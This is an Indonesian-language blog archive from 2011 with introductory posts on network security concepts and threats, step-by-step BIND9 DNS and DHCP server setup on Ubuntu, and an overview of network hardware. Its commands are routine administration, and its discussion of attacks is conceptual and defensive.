BALI TOLAK REKLAMASI

Minggu, 23 Oktober 2011

KEAMANAN JARINGAN

Minggu, Oktober 23, 2011 Posted by DENDY JEFRIANA No comments


1.   Apa itu Keamanan Jaringan

Satu hal yang perlu diingat bahwa tidak ada jaringan yang anti sadap atau tidak ada jaringan komputer yang benar-benar aman. Sifat dari jaringan adalah melakukan komunikasi. Setiap komunikasi dapat jatuh ke tangan orang lain dan disalahgunakan. Sistem keamanan membantu mengamankan jaringan tanpa menghalangi penggunaannya dan menempatkan antisipasi ketika jaringan berhasil ditembus. Selain itu, pastikan bahwa user dalam jaringan memiliki pengetahuan yang cukup mengenai keamanan dan pastikan bahwa mereka menerima dan memahami rencana keamanan yang Anda buat. Jika mereka tidak memahami hal tersebut, maka mereka akan menciptakan  lubang (hole) keamanan pada jaringan Anda.      

Ada dua elemen utama pembentuk keamanan jaringan :

·       Tembok pengamanan, baik secara fisik maupun maya, yang ditaruh diantara piranti dan layanan jaringan yang digunakan dan orang-orang yang akan berbuat jahat.

·       Rencana pengamanan, yang akan diimplementasikan bersama dengan user lainnya, untuk menjaga agar sistem tidak bisa ditembus dari luar.

        

Segi-segi keamanan didefinisikan dari kelima point ini.

a.        Confidentiality Mensyaratkan bahwa informasi (data) hanya bisa diakses oleh pihak yang memiliki wewenang.

b.        Integrity Mensyaratkan bahwa informasi hanya dapat diubah oleh pihak yang memiliki wewenang.

c.         Availability Mensyaratkan bahwa informasi tersedia untuk pihak yang memiliki wewenang ketika dibutuhkan.

d.        Authentication Mensyaratkan bahwa pengirim suatu informasi dapat diidentifikasi dengan benar dan ada jaminan bahwa identitas yang didapat tidak palsu.

e.         Nonrepudiation Mensyaratkan bahwa baik pengirim maupun penerima informasi tidak dapat menyangkal pengiriman dan penerimaan pesan.

Serangan (gangguan) terhadap keamanan dapat dikategorikan dalam empat kategori utama :

a. Interruption

Suatu aset dari suatu sistem diserang sehingga menjadi tidak tersedia atau tidak dapat dipakai oleh yang berwenang. Contohnya adalah perusakan/modifikasi terhadap piranti keras atau saluran jaringan.

b. Interception

Suatu pihak yang tidak berwenang mendapatkan akses pada suatu aset. Pihak yang dimaksud bisa berupa  orang, program, atau sistem yang lain. Contohnya adalah penyadapan terhadap data dalam suatu jaringan.

c. Modification

Suatu pihak yang tidak berwenang dapat melakukan perubahan terhadap suatu aset. Contohnya adalah perubahan nilai pada file data, modifikasi program sehingga berjalan dengan tidak semestinya, dan  modifikasi pesan yang sedang ditransmisikan dalam jaringan.

d. Fabrication

Suatu pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem.

Contohnya adalah pengiriman pesan palsu kepada orang lain.

Ada beberapa prinsip yang perlu dihindari dalam menangani masalah keamanan :

§       diam dan semua akan baik-baik saja

§       sembunyi dan mereka tidak akan dapat menemukan anda

§       teknologi yang digunakan kompleks/rumit, artinya aman

2.   Kepedulian Masalah Jaringan

Overview

Pendefinisian keamanan (pada jaringan komputer) dapat dilakukan dengan melihat target yang ingin dicapai melalui konsep 'aman'. Berikut adalah daftar fitur

 yang dapat mencegah/mengantisipasi serangan dari pihak luar ataupun pihak dalam.

Security Policy

Sebelum melanjutkan implementasi ke tingkat yang lebih jauh sebaiknya ditentukan dulu apa yang hendak dilindungi dan dilindungi dari siapa. Beberapa pertanyaan berikut dapat membantu penentuan kebijakan keamanan yang diambil.

1.    Informasi apa yang dianggap rahasia atau sensitif ?

2.    Anda melindungi sistem anda dari siapa ?

3.    Apakah anda membutuhkan akses jarak jauh?

4.    Apakah password dan enkripsi cukup melindungi ?

5.    Apakah anda butuh akses internet?

6.    Tindakan apa yang anda lakukan jika ternyata sistem anda dibobol?

Serta masih banyak pertanyaan lain tergantung bentuk organisasi yang anda kelola.

Kebijaksanaan keamanan  tergantung sebesar apa anda percaya orang lain, di dalam ataupun di luar organisasi anda. Kebijakan haruslah merupakan keseimbangan antara mengijinkan user untuk mengakses informasi yang dibutuhkan dengan tetap menjaga keamanan sistem.

Keamanan Secara Fisik

Fisik dalam bagian ini diartikan sebagai situasi di mana seseorang dapat masuk ke dalam ruangan  server/jaringan dan dapat mengakses piranti tersebut secara illegal. Orang yang tidak berkepentingan ini bisa saja seorang tamu, staf pembersih, kurir pengantar paket, dan lainnya yang dapat masuk ke ruangan tersebut dan mengutak-atik piranti yang ada. Apabila seseorang memiliki akses terhadap ruangan tersebut, orang  tersebut bisa saja memasang program trojan horse di komputer, melakukan booting dari floppy disk, atau  mencuri data-data penting (seperti file password) dan membongkarnya di tempat yang lebih aman.

Untuk  menjaga keamanan, taruhlah server di ruangan yang dapat dikunci dan pastikan bahwa ruangan tersebut  dikunci dengan baik. Untuk menghindari pengintaian, gunakan screen-saver yang dapat dipassword. Atur  juga semua komputer untuk melakukan fungsi auto-logout setelah tidak aktif dalam jangka waktu tertentu.

BIOS Security

Sebenarnya seorang  admin direkomendasikan men-disable boot dari floppy. Atau bisa dilakukan dengan membuat password pada BIOS dan memasang boot password.

Password Attack

Banyak orang menyimpan informasi pentingnya pada komputer dan seringkali sebuah password hal yang mencegah orang lain untuk melihatnya. Untuk menghindari serangan password maka sebaiknya user menggunakan password yang cukup baik. Petunjuk pemilihan password :

·       Semua password harus terdiri dari paling sedikit 7 karakter.

·       Masukkan kombinasi huruf, angka, dan tanda baca sebanyak mungkin dengan catatan bahwa password  tetap mudah untuk diingat. Salah satu caranya adalah mengkombinasikan kata-kata acak dengan tanda baca  atau dengan mengkombinasikan kata-kata dengan angka. Contoh : rasa#melon@manis, komputer0digital1, kurang<lebih>2001

·       Gunakan huruf pertama frasa yang gampang diingat. Contoh: dilarang parkir antara pukul 7 pagi hingga pukul 8 sore à dpap7php8s, tidak ada sistem yang benar-benar aman dalam konteks jaringan à tasybbadkj

·       Gunakan angka atau tanda baca untuk menggantikan huruf di password. Contoh : keberhasilan à k3b3rh45!l4n

·       Gantilah password secara teratur

Malicious Code

Malicious code bisa berupa virus, trojan atau worm, biasanya berupa kode instruksi yang akan memberatkan sistem sehingga performansi sistem menurun. Cara mengantisipasinya bisa dilihat pada 6 contoh berikut :

1.    berikan kesadaran pada user tentang ancaman virus.

2.    gunakan program anti virus yang baik pada workstation, server dan gateway internet (jika punya).

3.    ajarkan dan latih user cara menggunakan program anti virus

4.    sebagai admin sebaiknya selalu mengupdate program anti-virus dan database virus

5.    Biasakan para user untuk TIDAK membuka file attachment email atau file apapun dari floppy sebelum 110 % yakin atau tidak attachment/file tsb “bersih”.

6.    Pastikan kebijakan kemanan anda up to date.

Sniffer

Sniffer adalah sebuah device penyadapan komunikasi jaringan komputer dengan memanfaatkan mode premicious pada ethernet. Karena jaringan komunikasi komputer terdiri dari data biner acak maka sniffer ini biasanya memiliki penganalisis protokol sehingga data biner acak dapat dipecahkan. Fungsi sniffer bagi pengelola bisa untuk pemeliharaan jaringan, bagi orang luar bisa untuk menjebol sistem.

        Cara paling mudah untuk mengantisipasi Sniffer adalah menggunakan aplikasi yang secure, misal : ssh, ssl, secureftp dan lain-lain

Kamis, 15 September 2011

Konfigurasi DNS Server di Ubuntu Server

Kamis, September 15, 2011 Posted by DENDY JEFRIANA No comments
DNS itu singkatan dari Domain Name Server, jadi yang kita inget bukan alamat IP Address dari setiap komputer tapi nama yang diberikan untuk IP Address tersebut. Misalnya seperti www.yahoo.com atau www.google.com atau juga gadjah.net.
Kenapa? Karena manusia kesulitan kalo harus mengingat banyak nomor sekaligus, jadi dibuat sebuah program namanya DNS Server supaya manusia tinggal inget nama websitenya doang, tugasnya DNS Server untuk nerjemahin nama menjadi nomor.
Tapi sebelum dia bisa nerjemahin, kita harus install dan konfigurasi dulu DNS Server.
Install DNS Server:
sudo apt-get install bind9
Konfigurasi DNS Server:
Asumsi kita adalah:
IP Address DNS Server Statis
IP Address DNS Server          : 192.168.81.81
Nama Website                        : http://www.ardiansah.co.cc
Network                                 : 192.168.81.0
Gateway                                 : 192.168.81.81
Nama komputer                       : ubuntu
Yang pertama di konfigurasi adalah file named.conf.local:
sudo nano /etc/bind/named.conf.local
Buat konfigurasi seperti ini:
# zona untuk domain -> ip address
zone "ardiansah.co.cc" {
 type master;
 file "/etc/bind/zones/ardiansah.co.cc.db";
};
 
# zona untuk ip address -> domain
zone "81.168.192.in-addr.arpa" {
 type master;
 file "/etc/bind/zones/rev.81.168.192.in-addr.arpa";
};

Untuk mengakses DNS Server lain yang isinya lebih lengkap:
sudo nano /etc/bind/named.conf.options

Trus isikan IP Address atau Domain DNS Server lain yang lebih lengkap, misalnya:
forwarders {
 123.456.789.012;
};
Supaya DNS Server yang udah dibuat juga bisa mengakses dirinya sendiri:
sudo nano /etc/resolv.conf
Trus isi dirinya sendiri:
search ardiansah.co.cc.
nameserver 192.168.81.81
Akhirnya adalah kita buat zona untuk DNS Server, dengan urutan sebagai berikut:
sudo mkdir /etc/bind/zones
sudo nano /etc/bind/zones/ardiansah.co.cc.db
Trus isikan perintah sebagai berikut:
$TTL 1500
@ IN SOA ubuntu.ardiansah.co.cc. root (
  2007062703
  28800
  3600
  604800
  38400
);
ardiansah.co.cc.       IN           NS           ubuntu.ardiansah.co.cc.
ubuntu                                    IN           A             192.168.81.81
www                                      IN           CNAME    ubuntu
Kebalikannya adalah:
sudo nano /etc/bind/zones/rev.81.168.192.in-addr.arpa
Isikan perintah sebagai berikut:
$TTL 1500
@ IN SOA ubuntu.ardiansah.co.cc. root (
  2007062703
  28800
  3600
  604800
  38400
);
               IN NS     ubuntu.ardiansah.co.cc.
81            IN PTR    ubuntu.ardiansah.co.cc.

Akhirnya restart DNS Server:
sudo /etc/init.d/bind9 restart

Konfigurasi DHCP Server di ubuntu

Kamis, September 15, 2011 Posted by DENDY JEFRIANA No comments


Ditujukan bagi anda yang menggunakan gateway dari linux ubuntu baik server atau desktop sebagai server lokal jaringan dan internet sharing, dimana ini berfungsi mengalamati IP, Netmask, Gateway, dan DNS secara otomatis setiap klien/komputer yang akan terkoneksi ke jaringan internet

skema jaringan :

internet---(eth0) ubuntu (eth1)----pc klien

Catatan :

Setup dhcp ini di berlakukan dimana ada beberapa perlakuan khusus pada sejumlah komputer klien yang akan mendapat alamat IP Address yang tetap dan juga alamat IP Dynamis pada semua komputer dalam jaringan kalian.

Berikut contoh file konfigurasi jadi dan berjalan pada ubuntu server 9.10 saya, atau bisa di jadikan acuan sederhana dan bisa langsung di timpa ke file konfigurasi kalian di /etc/dhcp3/dhcpd.conf namun ingat sesuaikan mac address sesuai pc klien kalian :

Tahap Installasi :

apt-get install dhcp3-server

Tahap konfigurasi :

nano /etc/dhcp3/dhcpd.conf  dan samakan seperti dibawah ini

subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.2 192.168.0.200;
option domain-name-servers 180.131.144.144;
option domain-name "bonanza.net";
option routers 192.168.0.1;
option broadcast-address 192.168.0.255;
option subnet-mask 255.255.255.0;
default-lease-time 600;
max-lease-time 7200;

log-facility local7;

host op-1 {
hardware ethernet 44:87:FC:59:XX:FA;
fixed-address 192.168.0.2;
}
host user2 {
hardware ethernet 10:78:D2:8B:XX:EC;
fixed-address 192.168.0.102;
}
host user3 {
hardware ethernet 00:E0:4C:36:00:D3;
fixed-address 192.168.0.103;
}
host user4 {
hardware ethernet 00:E0:4C:36:XX:52;
fixed-address 192.168.0.104;
}
host user5 {
hardware ethernet 44:87:FC:59:XX1F;
fixed-address 192.168.0.105;
}
host user6 {
hardware ethernet 00:25:11:CF:XX:4C;
fixed-address 192.168.0.106;
}
host user7 {
hardware ethernet 44:87:FC:55:XX:F1;
fixed-address 192.168.0.107;
}
host user8 {
hardware ethernet 44:87:FC:55:XX:5C;
fixed-address 192.168.0.108;
}
host user9 {
hardware ethernet 00:25:11:D7:XX:D4;
fixed-address 192.168.0.101;
}
}

Penjelasan (perhatikan yang di cetak tebal) :

    192.168.0.0 adalah net id .
    192.168.0.2 192.168.0.200 adalah jangkauan IP yang akan di berikan kepada klien.
    "bonanza.net" hanya alias saja, sesuaikan dengan keinginan masing-masing.
    180.131.144.144 adalah dns server atau dari ISP yang dipakai, jika tidak membuat dns server.
    op-1 adalah nama dari sebutan/alias pc klien, sesuaikan dengan kemauan kalian.
    44:87:FC:59:XX:FA adalah MAC Address Pc Klien yang akan di berikan IP tetap pada saat terkoneksi.
    192.168.0.2 adalah IP untuk komputer yang mempunyai Mac Address yang sudah di definikan diatas

Jika sudah silahkan di save dan keluar dari editor pavorit kalian

Lanjut, kemudian interfaces ubuntu yang ke LAN di tambahkan pada /etc/default/dhcp3-server lalu ganti/samakan seperti dibawah ini, save dan keluar jika sudah

INTERFACES="eth1"

Lakukan restart :

/etc/init.d/dhcp3-server restart

Jumat, 19 Agustus 2011

materi jaringan

Jumat, Agustus 19, 2011 Posted by DENDY JEFRIANA No comments


Pendahuluan

Jaringan Komputer adalah sebuah kumpulan dari komputer, printer, dan peralatan lainnya yang terhubung dalam satu kesatuan dan membentuk suatu sistem tertentu. Informasi bergerak melalui kabel atau tanpa kabel sehingga memungkinkan pengguna jaringan komputer dapat saling bertukar informasi (data), mencetak pada printer yang sama dan dapat secara simultan menggunakan program aplikasi yang sama.

Ada beberapa pembagian dari jenis-jenis jaringan yaitu :

    LAN (Local Area Network)

Merupakan jaringan milik pribadi didalam gedung atau kampus yang berukuran sampai dengan beberapa kilometer. LAN sering digunakan untuk menghubungkan komputer-komputer pribadi dan workstation dalam kantor atau perusahaan untuk pemakaian bersama dan saling bertukar informasi.

    MAN ( Metropolitan Area Network)

Merupakan versi LAN yang berukuran lebih besar, biasanya menggunakan teknologi yang sama dengan LAN. MAN dapat mencakup kantor-kantor perusahaan yang letaknya berdekatan atau juga sebuah kota dan dapat dimanfaatkan untuk keperluan pribadi atau umum. MAN mampu menunjang data dan suara bahkan dapat digunakan untuk aplikasi TV kabel.

    WAN ( Wide Area Network)

Jangkauannya mencakup daerah geografis yang luas seringkali mencakup negara bahkan benua. Teknologi yang digunakan hampir sama dengan LAN.

    INTERNET (Interconnected Network)

Jangkauannya mencakup seluruh dunia yang merupakan gabungan dari LAN,WAN, dan MAN yang ada.

Perangkat keras yang dibutuhkan untuk membangun sebuah jaringan komputer yaitu : Komputer, Card Network, Hub, dan segala sesuatu yang berhubungan dengan koneksi jaringan seperti: Bridges, Router dan lainnya yang dibutuhkan untuk process transformasi data didalam jaringan.

1. File Servers
2. Workstations
3. Network Interface Cards
4. Concentrators/Hubs
5. Repeaters
6. Bridges
7. Routers

File Servers

Sebuah file server merupakan jantungnya kebayakan Jaringan, merupakan komputer yang sangat cepat, mempunyai memori yang besar, harddisk yang memiliki kapasitas besar, dengan kartu jaringan yang cepat. Sistem operasi jaringan tersimpan disini, juga termasuk didalamnya beberapa aplikasi dan data yang dibutuhkan untuk jaringan.

Workstations

Keseluruhan komputer yang terhubung ke file server dalam jaringan disebut sebagai workstation. Sebuah workstation minimal mempunyai ; Kartu jaringan, Aplikasi jaringan (sofware jaringan), kabel untuk menghubungkan ke jaringan, biasanya sebuah workstation tidak begitu membutuhkan Floppy karena data yang ingin di simpan bisa dan dapat diletakkan di file server. Hampir semua jenis komputer dapat digunakan sebagai komputer workstation.

Network Interface Cards (NIC) atau Kartu Jaringan

Kartu Jaringan (NIC) merupakan perangkat yang menyediakan media untuk menghubungkan antara komputer, kebanyakan kartu jaringan adalah kartu internal, yaitu kartu jaringan yang di pasang pada slot ekspansi di dalam komputer.
Kartu jaringan yang banyak terpakai saat ini adalah : kartu jaringan Ethernet, LocalTalk konektor, dan kartu jaringan Token Ring.

Hub/Konsentrator

Sebuah Konsentrator/Hub adalah sebuah perangkat yang menyatukan kabel-kabel network dari tiap-tiap workstation, server atau perangkat lain. Dalam topologi Bintang, kabel twisted pair datang dari sebuah workstation masuk kedalam hub.

Hub mempunyai banyak slot concentrator yang mana dapat dipasang menurut nomor port dari card yang dituju.

Repeaters

Contoh yang paling mudah adalah pada sebuah LAN menggunakan topologi Bintang dengan menggunakan kabel unshielded twisted pair. Dimana diketahui panjang maksimal untuk sebuah kabel unshileded twisted pair adalah 100 meter, maka untuk menguatkan sinyal dari kabel tersebut dipasanglah sebuah repeater pada jaringan tersebut.

Bridges / Jembatan

Adalah sebuah perangkat yang membagi satu buah jaringan kedalam dua buah jaringan, ini digunakan untuk mendapatkan jaringan yang efisien, dimana kadang pertumbuhan network sangat cepat makanya di perlukan jembatan untuk itu. Kebanyakan Bridges dapat mengetahui masing-masing alamat dari tiap-tiap segmen komputer pada jaringan sebelahnya dan juga pada jaringan yang lain disebelahnya pula. Bridges juga dapat di gunakan untuk mengkoneksi diantara network yang menggunakan tipe kabel yang berbeda ataupun topologi yang berbeda pula.

Routers

Sebuah Router mengartikan informaari dari satu jaringan ke jaringan yang lain, dia hampir sama dengan Bridge namun agak pintar sedikit, router akan mencari jalur yang terbaik untuk mengirimkan sebuah pesan yang berdasakan atas alamat tujuan dan alamat asal.

Sementara Bridges dapat mengetahui alamat masing-masing komputer di masing-masing sisi jaringan, router mengetahui alamat komputerr, bridges dan router lainnya. router dapat mengetahui keseluruhan jaringan melihat sisi mana yang paling sibuk dan dia bisa menarik data dari sisi yang sibuk tersebut sampai sisi tersebut bersih.

Cara melindungi LAN :

1. VLAN (Virtual Local Area Network)

Suatu model jaringan yang tidak terbatas pada lokasi fisik seperti LAN , hal ini mengakibatkan suatu network dapat dikonfigurasi secara virtual tanpa harus menuruti lokasi fisik peralatan. Penggunaan VLAN akan membuat pengaturan jaringan menjadi sangat fleksibel dimana dapat dibuat segmen yang bergantung pada organisasi atau departemen, tanpa bergantung pada lokasi workstation.

2. Firewall

Suatu cara/sistem/mekanisme yang diterapkan baik terhadap hardware , software ataupun sistem itu sendiri dengan tujuan untuk melindungi, baik dengan menyaring, membatasi atau bahkan menolak suatu atau semua hubungan/kegiatan suatu segmen pada jaringan pribadi dengan jaringan luar yang bukan merupakan ruang lingkupnya. Segmen tersebut dapat merupakan sebuah workstation, server, router, atau local area network (LAN) anda.

3. Port Security

4.RADIUS / TACACS Server

TACACS (Terminal Access Controller Access-Control SystemServer) merupakan protokol yang menyediakan layanan akses kontrol pada router, switch, dan peralatan jaringan lainnyadigunakan untuk mempermudah dalam pengelolaan authentikasi, authorization dan accounting menjadi terpusat. Bayangkan jika kita mempunyai banyak router atau switch, jika kita ingin mengganti password maka akan memerlukan waktu yang banyak jika mengganti satu persatu maka disinilah Server tacacs berperan.

Tujuan Keamanan Jaringan Komputer :

• Availability / Ketersediaan
• Reliability / Kehandalan
• Confidentiality / Kerahasiaan

Cara Pengamanan Jaringan Komputer :

a. Autentikasi

    Proses pengenalan peralatan, sistem operasi, kegiatan, aplikasi dan identitas    user yang terhubung dengan jaringan komputer.
    Autentikasi dimulai pada saat user login ke jaringan dengan cara memasukkan password.

Tahapan Autentikasi :

    Autentikasi untuk mengetahui lokasi dari peralatan pada suatu simpul jaringan (data link layer dan network layer)
    Autentikasi untuk mengenal sistem operasi yang terhubung ke jaringan (transport layer)
    Autentikasi untuk mengetahui fungsi/proses yang sedang terjadi di suatu simpul jaringan (session dan presentation layer)
    Autentikasi untuk mengenali user dan aplikasi yang digunakan (application layer)

b.  Enkripsi

    Teknik pengkodean data yang berguna untuk menjaga data / file baik di dalam komputer maupun pada jalur komunikasi dari pemakai yang tidak dikehendaki.
    Enkripsi diperlukan untuk menjaga kerahasiaan data.

Teknik Enkripsi
• DES (Data Encription Standard)

• RSA (Rivest Shamir Adelman)

Resiko Jaringan Komputer :

Segala bentuk ancaman baik fisik maupun logik yang langsung atau tidak langsung mengganggu kegiatan yang sedang berlangsung dalam jaringan.

Faktor- Faktor Penyebab Resiko Dalam Jaringan Komputer :

    Kelemahan manusia (human error)
    Kelemahan perangkat keras komputer
    Kelemahan sistem operasi jaringan
    Kelemahan sistem jaringan komunikasi

Ancaman Jaringan Komputer

    FISIK

    Pencurian perangkat keras komputer atau perangkat jaringan
    Kerusakan pada komputer dan perangkat komunikasi jaringan
    Wiretapping
    Bencana alam

    LOGIK

    Kerusakan pada sistem operasi atau aplikasi
    Virus
    Sniffing

Beberapa Bentuk Ancaman Jaringan :

- Sniffer

Peralatan yang dapat memonitor proses yang sedang berlangsung

- Spoofing

Penggunaan komputer untuk meniru (dengan cara menimpa identitas atau alamat IP.

- Phreaking

Perilaku menjadikan sistem pengamanan telepon melemah.

- Remote Attack

Segala bentuk serangan terhadap suatu mesin dimana penyerangnya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.

- Hole

Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang tidak memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses autorisasi.

- Hacker

    Orang yang secara diam-diam mempelajari sistem yang biasanya sukar dimengerti untuk kemudian mengelolanya dan men-share hasil ujicoba yang dilakukannya.
    Hacker tidak merusak sistem

- Craker

    Orang yang secara diam-diam mempelajari sistem dengan maksud jahat
    Muncul karena sifat dasar manusia yang selalu ingin membangun (salah satunya merusak)

– Ciri-ciri cracker :

• Bisa membuat program C, C++ atau pearl
• Memiliki pengetahuan TCP/IP
• Menggunakan internet lebih dari 50 jam per-bulan
• Menguasai sistem operasi UNIX atau VMS
• Suka mengoleksi software atau hardware lama
• Terhubung ke internet untuk menjalankan aksinya
• Melakukan aksinya pada malam hari, dengan alasan waktu yang memungkinkan, jalur komunikasi tidak padat, tidak mudah diketahui orang lain

– Penyebab cracker melakukan penyerangan :
• spite, kecewa, balas dendam
• sport, petualangan
• profit, mencari keuntungan dari imbalan orang lain
• stupidity, mencari perhatian
• cruriosity, mencari perhatian
• politics, alasan politis

Identifikasi virus,trojan,worm

Jumat, Agustus 19, 2011 Posted by DENDY JEFRIANA No comments


Soal.

1.      Mencari  jenis-jenis keamanan jaringan !

2.      Macam-macam ancaman dalam keamanan jaringan !

3.      Mengidentifikasi  virus,trojan,worm

A.     Identifikasi  virus,trojan,worm

B.      Cara penyebaran virus,trojan,worm

C.    Cara penanganan virus,trojan,wrm.

Jawab.

1. Jenis-jenis keamanan dalam jaringan :

    Keamanan fisik ( kebakaran, pencurian, listrik, dll)
    Keamanan data (hilang, berubah, terganggu )
    Keamanan system ( personil, software/system informasi, jaringan computer)

Prinsip keamanan jaringan

Sebelum memahami berbagai macam ancaman keamanan jaringan, anda perlu memahami prinsip keamanan itu sendiri.

1. Kerahasiaan (confidentiality), dimana object tidak di umbar atau dibocorkan kepada subject yang tidak seharusnya berhak terhadap object tersebut, atau lazim disebut tidak authorize.

2. Integritas (Integrity), bahwa object tetap orisinil, tidak diragukan keasliannya, tidak dimodifikasi dalam perjalanan nya dari sumber menuju penerimanya.

3. Ketersediaan (Availability), dimana user yang mempunyai hak akses atau authorized users diberi akses tepat waktu dan tidak terkendala apapun.

Prinsip keamanan ini lazim disebut segitiga CIA (Confidentiality, Integrity, Availability). Dan salah satu goal utama dari pengendalian akses adalah untuk menjaga jangan sampai ada yang tidak authorize mengakses objek-2 seperti jaringan; layanan-2; link komunikasi; komputer atau system infrastruktur jaringan lainnya oleh apa yang kita sebut sebagai ancaman keamanan jaringan.

Dalam perjalanan anda untuk membangun suatu system kemanan jaringan, salah satu prosesnya adalah menilai resiko keamanan dalam organisasi anda. Akan tetapi terlebih dahulu anda perlu juga memahami berbagai jenis ancaman keamanan jaringan.

Jenis-jenis keamanan jaringan

Jenis-jenis keamanan jaringan dalam pengertiannya lebih mengarah ke bagaimana kita bertahan dari serangan atau ancaman dari jaringan

Metode-metode yang dapat diterapkan untuk membuat jaringan komputer menjadi lebih aman, antara

lain:

1.      IDS / IPS

Intrusion Detection System (IDS) dan Intrusion Prevention System (IPS) adalah sistem yang banyak digunakan untuk mendeteksi dan melindungi sebuah sistem keamanan dari serangan

oleh pihak luar maupun dalam. Sebuah IDS dapat berupa IDS berbasiskan jaringan komputer atau berbasiskan host. Pada IDS berbasiskan jaringan komputer, IDS akan menerima kopi paket yang ditujukan pada sebuah host untuk kemudian memeriksa paket-paket tersebut. Apabila ternyata ditemukan paket yang berbahaya, maka IDS akan memberikan peringatan pada pengelola sistem. Karena paket yang diperiksa hanyalah salinan dari paket yang asli, maka sekalipun ditemukan paket yang berbahaya, paket tersebut akan tetap mencapai host yang ditujunya. Sebuah IPS bersifat lebih aktif daripada IDS. Bekerja sama dengan firewall, sebuah IPS dapat memberikan keputusan apakah sebuah paket dapat diterima atau tidak oleh sistem. Apabila IPS menemukan bahwa paket yang dikirimkan adalah paket yang berbahaya, maka IPS akan memberitahu firewall sistem untuk menolak paket data tersebut. Dalam membuat keputusan apakah sebuah paket data berbahaya atau tidak, IDS dan IPS dapat

mempergunakan metode :

• Signature-based Intrusion Detection System. Pada metode ini, telah tersedia daftar signature yang dapat digunakan untuk menilai apakah paket yang dikirimkan berbahaya atau tidak. Sebuah paket data akan dibandingkan dengan daftar yang sudah ada. Metode ini akan melindungi sistem dari jenis-jenis serangan yang sudah diketahui sebelumnya. Oleh karena itu, untuk tetap menjaga keamanan sistem jaringan komputer, data signature yang ada harus tetap ter-update.

• Anomaly-based Intrusion Detection System. Pada metode ini, pengelola jaringan harus melakukan konfigurasi terhadap IDS dan IPS, sehingga IDS dan IPS dapat mengatahui pola paket seperti apa saja yang akan ada pada sebuah sistem jaringan komputer. Sebuah paket anomali adalah paket yang tidak sesuai dengan kebiasaan jaringan computer tersebut. Apabila IDS dan IPS menemukan ada anomali pada paket yang diterima atau dikirimkan, maka IDS dan IPS akan memberikan peringatan pada pengelola jaringan (IDS) atau akan menolak paket tersebut untuk diteruskan (IPS). Untuk metode ini, pengelola jaringan harus terus-menerus memberi tahu IDS dan IPS bagaimana lalu lintas data yang normal pada sistem jaringan komputer tersebut, untuk menghindari adanya salah penilaian oleh IDS atau IPS.

2.      Network Topology

Selain permasalahan aplikasi yang akan mempergunakan jaringan komputer, topologi jaringan komputer juga memiliki peranan yang sangat penting dalam keamanan jaringan komputer. Pembagian kelompok komputer sesuai dengan tugas yang akan diembannya adalah suatu hal yang perlu dilakukan. Dengan adanya pembagian kelompok-kelompok jaringan komputer, apabila terjadi gangguan keamanan pada sebuah kelompok jaringan komputer, tidak akan dengan mudah menyebar ke kelompok jaringan komputer lainnya. Selain itu metode keamanan

yang diterapkan pada setiap kelompok jaringan komputer juga bisa berbeda-beda, sesuai dengan peranannya masing-masing.

3.      Port Scanning

Metode Port Scanning biasanya digunakan oleh penyerang untuk mengetahui port apa saja yang terbuka dalam sebuah sistem jaringan komputer. Tetapi metode yang sama juga dapat digunakan oleh pengelola jaringan komputer untuk menjaga jaringan komputernya. Sebuah port yang terbuka menandakan adanya aplikasi jaringan komputer yang siap menerima koneksi. Aplikasi ini dapat menjadi pintu masuk penyerang ke dalam sistem jaringan computer sebuah organisasi. Oleh karena itu sangat penting bagi seorang pengelola jaringan computer untuk tahu secara pasti, aplikasi jaringan komputer apa saja yang berjalan dan siap menerima koneksi pada sebuah host. Apabila ditemukan bahwa ada port yang terbuka dan tidak sesuai dengan perencanaan yang ada, maka aplikasi yang berjalan pada port tersebut harus segera dimatikan agar tidak menjadi lubang keamanan.

Cara kerja port scanner adalah dengan cara mengirimkan paket inisiasi koneksi ke setiap port yang sudah ditentukan sebelumnya. Apabila ternyata port scanner menerima jawaban dari sebuah port, maka ada aplikasi yang sedang bekerja dan siap menerima koneksi pada port tersebut.

4.      Packet Fingerprinting

Karena keunikan setiap vendor peralatan jaringan komputer dalam melakukan implementasi protokol TCP/IP, maka paket-paket data yang dikirimkan setiap peralatan menjadi unik peralatan tersebut. Dengan melakukan Packet Fingerprinting, kita dapat mengetahui peralatan

apa saja yang ada dalam sebuah jaringan komputer. Hal ini sangat berguna terutama dalam sebuah organisasi besar dimana terdapat berbagai jenis peralatan jaringan komputer serta system operasi yang digunakan. Setiap peralatan dan sistem operasi memiliki karakteristik serta

kelemahannya masing-masing, oleh karena itu, sangat penting bagi pengelola jaringan komputer untuk dapat mengetahui peralatan dan sistem operasi apa saja yang digunakan dalam organisasi tersebut. Dengan mengetahui peralatan jenis apa atau sistem operasi apa saja yang ada pada sebuah organisasi, pengelola jaringan komputer dapat lebih siap dalam melakukan pengamanan jaringan komputer organisasi tersebut

5.      Security Information Management

Salah satu penyebab utama dari kegagalan sistem keamanan jaringan komputer adalah kesalahan pengelola dalam melakukan analisa informasi yang dihasilkan masing-masing perangkat keamanan jaringan komputer. Kesalahan analisa dapat menyebabkan pengelola lambat, salah atau tidak terarah dalam menghadapi serangan yang sedang berlangsung. Oleh karena itu, salah satu alat bantu yang dapat digunakan oleh pengelola jaringan computer adalah Security Information Management (SIM). SIM berfungsi untuk menyediakan seluruh infomasi yang terkait dengan pengamanan jaringan komputer secara terpusat. Dengan menggunakan SIM, pengelola dapat dengan mudah mengetahui kondisi seluruh peralatan yang dimilikinya dan melakukan identifikasi serangan yang ada. Pada fungsi paling dasarnya, SIM akan mengumpulkan semua log dan alert yang dihasilkan oleh semua peralatan keamanan jaringan komputer yang ada ke dalam satu tempat, sehingga mempermudah pengelolaan. Pada perkembangannya SIM tidak hanya berfungsi untuk mengumpulkan data-data dari semua peralatan keamanan jaringan komputer tapi juga memiliki kemampuan untuk analisa data melalui teknik korelasi dan query data terbatas sehingga menghasilkan peringatan dan laporan

yang lebih lengkap dari masing-masing serangan.

Dengan mempergunakan SIM, pengelola jaringan komputer dapat mengetahui secara lebih cepat bahwa sedang ada serangan dan dapat melakukan penanganan yang lebih terarah, sehingga keamanan jaringan komputer organisasi tersebut lebih terjamin.

6.      Firewall

